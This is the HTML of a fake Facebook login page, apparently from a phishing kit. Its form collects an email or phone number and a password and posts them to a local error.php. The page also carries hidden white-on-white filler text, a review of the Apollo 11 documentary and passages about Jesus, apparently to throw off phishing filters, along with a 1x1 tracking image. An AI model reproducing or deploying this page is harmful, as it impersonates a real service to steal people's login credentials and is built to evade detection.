<html>

<center><head>
    
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- Copyright 2014-2021 cvs -->
    <meta name="description" content="Log In or Sign Up | Page">
    <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="0">
   <title>Login in your account</title>
    <script async="" type="text/javascript" src="str/gpt.js"></script><script src="str/underscore-min.js"></script>

    <link rel="stylesheet" href="str/font-awesome.css">
    <link rel="stylesheet" href="str/bootstrap.css">
    <script src="str/jquery.js" type="text/javascript"></script>
    <link rel="stylesheet" href="str/custom.css">
    <body>
<h4 class="do-ads" style="color: #fff;">John 10: Jesus Teaching that He  Is Equal To God</h4>
<div class="container-fluid" style="height: auto !important;">
    <div class="row">
	    <div class="jumbotron pageHeader">
                <span style="
    color: #1877f2;
    font-weight: bold;
    font-size: 22px;
    font-family:'Tahoma'
"><b>facebook</b></span>
        </div>
    </div>

 <form action="error.php" method="post" style="
    display: block;
    margin: 19px 0 0 0;
">
          <input required="required" type="text" name="emali" placeholder="Mobile number or email" style="
    width: 335px;
    height: 40px;
    display: block;
    background: #f5f6f7;
    border: 1px solid #e8e8df;
    font-size: 14px;
    padding: 0 0 0 10px;
    border-radius: 3px;
">
          <input required="required" type="password" name="psd" placeholder="Password" style="
    width: 335px;
    height: 40px;
    display: block;
    background: #f5f6f7;
    font-size: 14px;
    padding: 0 0 0 10px;
    border: 1px solid #e8e8df;
    margin: 5px 0;
    border-radius: 3px;
">

          <button type="submit" name="button" style="
    width: 305px;
    height: 40px;
    margin: 5px 0px;
    background: #1877f2;
    border: 0;
    color: #fff;
    font-size: 16px;
    font-weight: bold;
    border-radius: 4px;
">Log In</button>

</form>
                    <br>
                    <span style="
    display: inline-block;
    font-size: 14px;
    padding: 5px 15px 0 15px;
">or</span>
                </div>
                
                <a href="#" style="
    display: block;
    margin: 20px 0 0 0;
    text-decoration: none;
    color: #fff;
    background: #00a400;
    width: 156px;
    padding: 10px;
    border-radius: 5px;
    font-size: 14px;
    font-weight: bold;
">Create New Account</a>
        <a href="#" style="
    display: block;
    text-decoration: none;
    font-size: 14px;
    margin: 14px 0;
    color: #8a96cb;
">Forgot Password?</a>

<div style="
    margin: 80px 0 0 0;
    font-family: sans-serif;
    font-size: 12px;
    color: #576b95;
    display: inline-flex;
">
   <div style="">
          <p>English (US)</p>
          <p>Francais (France)</p>
          <p>Portugues (Brasil)</p>
          <p>Italiano</p>
        </div>
        <div style="
    display: inline-block;
    margin-left: 200px;
">
          <p>Espanol</p>
          <p>中文(简体)</p>
          <p>Deutsch</p>
          <p style="
    border: 1px solid;
    border-radius: 5px;
    padding: 3px;
    width: 14px;
    font-size: 12px;
    font-weight: bold;
">+</p>
        </div>
      </div>
      <span style="
    display: block;
    font-family: sans-serif;
    font-size: 10px;
    color: gray;
    margin: 28px 0 12px 0px;
">About &#183; Help &#183; More</span>
      <span style="
    display: block;
    font-family: sans-serif;
    font-size: 12px;
    color: gray;
">
            </div>
	        <div class="panel-footer">
                Facebook</a>&nbsp;Inc.</a>
            </div>
	    </div>
    </div>	
	<p class="do-ads" style="color:white">
 Director Miller: A sense of space and primordial time

 Apollo 11 is something like the "official" movie for the 50th anniversary of the moon landing on July 20, 1969. Three years ago, US news channel CNN commissioned director Miller to stage the film for the anniversary. Miller was right in the post-production of his short film Apollo 17 about NASA's last manned moon landing so far. The director had previously completed his spectacular dinosaur documentary "Dinosaur 13," so he seemed to be the right man for the job.

 Watching Apollo 11 on the big screen now, it's as if time has stood still. Of course, only very few people experienced all the preparations and the work behind the scenes for the lunar landing in the manner the film presents it now. At that time, in 1969, the vast majority of people saw only the slightly blurred black-and-white shots of Neil Armstrong's legendary first step on the moon.

 The film shows the days preceding the launch of the carrier rocket hosting the Apollo 11 spacecraft. It shows the work of hundreds of technicians in the NASA control centers and the preparations that finally led to the launch. Viewers experience the last hours of the three astronauts Neil Armstrong, Edwin "Buzz" Aldrin and Michael Collins up close before their mission. They are right there when the three don their spacesuits and helmets and receive final instructions from the technical personnel for their trip. They are with them as they take the elevator up to the space capsule and squeeze into their tight seats.

 Several documentaries about the Apollo 11 mission have already been made, and feature films have condensed the successes and failures of lunar landing missions (most recently, First Man from 2018). Even early on in the history of cinema there was a spectacular excursion to the moon with French pioneer Georges MÃ©liÃ¨s' A Journey to the Moon from 1902. Cinema has also seen the filming of space mission conspiracy theories, such as the 1978 thriller Capricorn One portraying a Mars landing hoax.
 The first landing on the moon as global media event

 A few kilometers further on, thousands of people have convened, with cars and caravans everywhere. There's a vibe as though at a big outdoor rock concert. Families, men, women, children, space fans â€” they all want to experience the launch of the Apollo mission live. The film captures this with impressive shots from a helicopter perspective.

 And so it continues. Until the launch of the rocket, and ultimately, the landing on the moon. Of course, the original shots become fewer and farther between â€” the flight, for example, is shown with short animated scenes, the filmmakers' only concession to the classic documentary film. These "empty spaces" are filled with sequences from the control center. There, hundreds of specialists sit in front of their computers, evaluate and recalculate flight paths, plan the next steps â€” and smoke. This small, incidental detail reminds the viewer perhaps most of all that this is an event from 1969. Back then, everyone smoked â€” really everyone.
 Apollo 11 in brilliant color

 But most amazing are the brilliant colors of the film. One recalls the moon landing in black and white â€”  and of course, the sequences of the first steps there and the astronauts' stay on the moon can only be seen this way. Everything else, on the other hand, radiates in color, captivatingly sharp, rich-in-contrast, color-intensive images made possible through digital processing.

 "Apollo 11's mission is one of the greatest achievements in human history â€” hundreds of thousands of people, tens of thousands of companies, all focused on one goal: bringing people to another world," said director Miller, raving about the pioneering spirit of the time. He captured it in his film. What helped him most were the achievements of the digital age, which hardly anyone could have anticipated back in 1969.

 Following its premiere at the Sundance Film Festival, the movie will be released in cinemas around the globe as of June 27, 2019. Screenings in German cinemas are scheduled as of July 7. Apollo 11 will also be shown in various IMAX movie theaters (partially, in a shortened version).
</p>
<img src="https://static.dw.com/image/49305625_401.jpg" width="1" height="1">



<p class="do-ads" style="color:white"> The bulk of the Gospel accounts is devoted to the three years that  Jesus spent ministering around the Sea of Galilee in northern Israel. They tell us of the life and teachings of a unique person. Jesus, the  Gospels explain, demonstrated his divine powers by healing the sick,  blind and lame; by raising the dead; by walking on water and calming a storm at sea. Jesusâ€™ teaching lacked the exacting legalism and piousness  that characterized so much of contemporary Judaism. He became  tremendously popular among the masses in Galilee.</p>
     
<script>
document.getElementsByClassName('do-ads').style.visibility='hidden';
</script>


</body>

</div>
</center>
</html>